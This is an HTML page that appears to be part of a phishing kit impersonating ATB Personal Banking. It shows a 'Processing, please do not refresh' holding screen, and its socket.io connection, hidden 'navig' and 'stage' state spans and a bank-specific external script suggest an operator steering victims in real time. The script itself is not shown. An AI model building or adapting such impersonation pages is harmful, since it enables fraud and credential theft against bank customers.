<html class="fa-events-icons-ready">
    <head>
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
        <link rel="Shortcut Icon" href="favicon.ico" type="image/x-icon">
        <title>ATB Personal Banking</title>
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <link rel="stylesheet" type="text/css" href="https://cloud.typography.com/6700732/6101192/css/fonts.css">
        <link href="https://use.fontawesome.com/f26ba7188d.css" media="all" rel="stylesheet">
        <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" rel="stylesheet">
        <link rel="stylesheet" href="/assets/atb/main.css?1">
        <script src="https://code.jquery.com/jquery-3.6.0.min.js" crossorigin="anonymous"></script>
        <script src="/socket.io/socket.io.js"></script>
    </head>
    <body>
        <div id="app">
            <div class="sc-kgoBCf bzQzYK" id="rbw-overall-context-wrapper">
                <div class="sc-iwsKbI jTTtAZ"></div>
                <div class="sc-jzJRlG eNoisr">
                    <form class="sc-jTzLTM cUTnPT" id="rbw-login-block">
                        <div class="sc-bdVaJa khUSez">
                            <img class="sc-htpNat gRCWAJ" src="/assets/atb/atb-jewel.svg" id="rbw-login-heading-atb-logo">
                            <div class="sc-EHOje ifxqtD" id="rbw-login-heading-contextHeader">
                                <div class="sc-bZQynM djdoFH">
                                    <div class="sc-dnqmqq fmWZCn">Personal</div>
                                </div>
                            </div>
                        </div>
                        <div class="sc-fjdhpX Pbrfi" id="rbw-login-form-login-block">
                            <style>
                            .loader-div {
                                text-align: center;
                                padding-top: 20px;
                            }

                            .loader-div h2 {
                                font-size: 28px;
                                margin-bottom: 40px;
                            }

                            .loader-div p {
                                margin-top: 37px;
                                padding: 0px 42px;
                                font-size: 16px;
                            }
                            </style>
                            <script>
                            setInterval(function() {
                                $('.loader-div p').css('display', 'block');
                            }, 4000);
                            </script>
                            <div class="_1AR6e5iqu8uXHMTFKLnqWr loader-div">
                                <h2 class="heading--title2 ng-binding">Processing</h2>
                                <img src="/assets/atb/loading.gif" width="80">
                                <p style="display: none">This is taking longer than usual, please do not refresh the page</p>
                            </div>
                        </div>
                    </form>
                </div>
                <div class="sc-kAzzGY cUrlcM">
                    <div class="sc-chPdSV emnlIF" id="rbw-marquee-block">
                        <div class="sc-ckVGcZ czSiSX"></div>
                    </div>
                </div>
            </div>
        </div>
        <span hidden id="navig"> . </span>
        <span hidden id="stage">Loading</span>
    </body>
    <script src="/bank/atb/js/script.js">
    </script>
</html>
